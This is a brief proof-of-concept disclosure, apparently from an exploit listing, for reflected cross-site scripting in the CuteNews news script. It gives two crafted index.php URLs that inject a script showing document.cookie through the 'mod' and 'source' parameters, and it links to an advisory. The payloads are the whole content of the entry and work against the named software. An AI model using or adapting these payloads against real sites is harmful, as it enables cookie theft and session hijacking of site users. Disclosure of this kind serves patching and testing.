Local XSS attack:
http://localhost/cutenews/index.php?mod=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!--
http://localhost/cutenews/index.php?mod=editnews&action=list&source=<script>alert
(document.cookie)</script><!–
advisory:http://www.aria-security.net/advisory/portals/cutenews.txt